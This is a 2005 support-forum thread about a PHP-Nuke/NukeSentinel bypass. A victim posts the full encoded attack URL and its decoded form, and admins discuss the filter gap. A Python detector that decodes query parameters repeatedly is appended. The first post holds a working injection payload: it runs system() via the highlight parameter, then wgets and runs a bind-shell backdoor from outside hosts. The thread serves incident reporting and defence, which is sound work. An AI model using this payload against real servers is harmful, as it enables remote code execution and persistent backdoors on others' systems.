Ravens PHP Scripts: Forums
 

 

Pepper
New Member
Joined: Mar 16, 2005
Posts: 1

Posted: Wed Mar 16, 2005 1:06 pm

Not entirely clear I should be posting this in this forum, but I am running Sentinel 2.20 (upgraded from 2.13 after this script got past it, but reproduced it on 2.20 as well).

My hosting provider suspended my site today after somebody used the following URL to run wget commands on their server:

/main/modules.php?name=Forums&file=viewtopic&t=6034&start=10&highlight=%2527%252Esystem%28%24%48%54%54%50%5F%47%45%54%5f%56%41%52%53%5B%6C%6F%6C%5D%2529%252e%2527&lol=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%68%68%74%74%70%3A%2F%2F%77%77%77%2E%6D%69%63%6B%65%79%73%6D%74%6E%2E%63%6F%6D%2F%6E%75%6B%65%2F%68%6F%73%74%3B%63%68%6D%6F%64%20%2B%78%20%68%6F%73%74%3B%2E%2F%68%6F%73%74%3B%72%6D%20%2D%72%66%20%68%6F%73%74%3B%77%67%65%74%20%68%68%74%74%70%3A%2F%2F%68%6F%6D%65%2E%61%72%63%6F%72%2E%64%65%2F%71%61%75%74%68%39%2F%62%69%6E%64%69%74%3B%6D%76%20%62%69%6E%64%69%74%20%68%68%74%74%70%64%3B%2E%2F%68%68%74%74%70%64%20%31%74%70%64%20%31%32%34%38%3B%72%6D%20%2D%72%66%20%68%68%74%74%70%64%3B%20%65%63%68%6F%20%5F%45%4E%44%5F

I ran this through urldecode - TWICE - to get the following code:
/main/modules.php?name=Forums&file=viewtopic&t=6034&start=10&highlight='.system($HTTP_GET_VARS[lol]).'&lol=echo _START_; cd /tmp;wget [ Only registered users can see links on this board! Get registered or login! ] x host;./host;rm -rf host;wget [ Only registered users can see links on this board! Get registered or login! ] bindit hhttpd;./hhttpd 1tpd 1248;rm -rf hhttpd; echo _END_

I previously needed to remove the 'highlight' keyword check from the Santy worm checking, otherwise my forums break left, right and center, but I do have the relevant .htaccess commands in place as well.

Should Sentinel have caught this, or is this a new attack, or am I missing something else?
 
BobMarion
Former Admin in Good Standing
Joined: Oct 30, 2002
Posts: 1037
Location: RedNeck Land (known as Kentucky)

Posted: Thu Mar 17, 2005 2:15 am

With the highlight removed, NukeSentinel does not stop this, but I will find a way to filter it :)

_________________
Bob Marion
Codito Ergo Sum
http://www.nukescripts.net

Last edited by BobMarion on Thu Mar 17, 2005 12:59 pm; edited 1 time in total 
chatserv
Member Emeritus
Joined: May 02, 2003
Posts: 1389
Location: Puerto Rico

Posted: Thu Mar 17, 2005 12:38 pm

Most likely because of:
$highlight = urlencode($HTTP_GET_VARS['highlight']);
 
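The double encoding described in the first post, as an added example that is not part of the original thread and is not NukeSentinel's code: a Python check that decodes each query parameter to a fixed point before matching, so a quote hidden as %2527 is inspected in its final form. The `highlight` value is copied from the request in the first post (the `lol` parameter is left out); the function names, the pattern and the two benign requests are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

MAX_ROUNDS = 5  # bound the decode loop so deeply nested encoding cannot stall the scanner

# Assumed heuristic (not NukeSentinel's rule): a quote, the PHP concatenation
# dot, then a function call, i.e. the shape of the '.system(...).' break-out.
BREAKOUT = re.compile(r"""['"]\s*\.\s*\w+\s*\(""")

def decode_to_fixed_point(value):
    """Percent-decode until the text stops changing; return (text, rounds used)."""
    rounds = 0
    while rounds < MAX_ROUNDS:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def classify(request_target):
    """Map each query parameter to (verdict, extra decode rounds, visible after one decode)."""
    results = {}
    # parse_qsl applies the first decode, as PHP does when it fills the GET variables.
    for name, once in parse_qsl(urlsplit(request_target).query, keep_blank_values=True):
        full, extra = decode_to_fixed_point(once)
        if BREAKOUT.search(full):
            verdict = "breakout"
        elif extra:
            verdict = "multi-encoded"
        else:
            verdict = "ok"
        results[name] = (verdict, extra, bool(BREAKOUT.search(once)))
    return results

# highlight value copied from the request in the first post; lol parameter left out.
ATTACK = ("/main/modules.php?name=Forums&file=viewtopic&t=6034&start=10&highlight="
          "%2527%252Esystem%28%24%48%54%54%50%5F%47%45%54%5f%56%41%52%53"
          "%5B%6C%6F%6C%5D%2529%252e%2527")
# Constructed benign requests for comparison.
PLAIN = "/main/modules.php?name=Forums&file=viewtopic&t=1&highlight=nuke+sentinel"
DOUBLE = "/main/modules.php?name=Forums&file=viewtopic&t=1&highlight=50%2520off"

if __name__ == "__main__":
    for target in (ATTACK, PLAIN, DOUBLE):
        print(classify(target)["highlight"])
```

The third element of each result shows whether a filter that matches after a single decode would have seen the break-out; for the request from the first post it is False, while the fixed-point pass reports it.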
All times are GMT - 6 Hours
 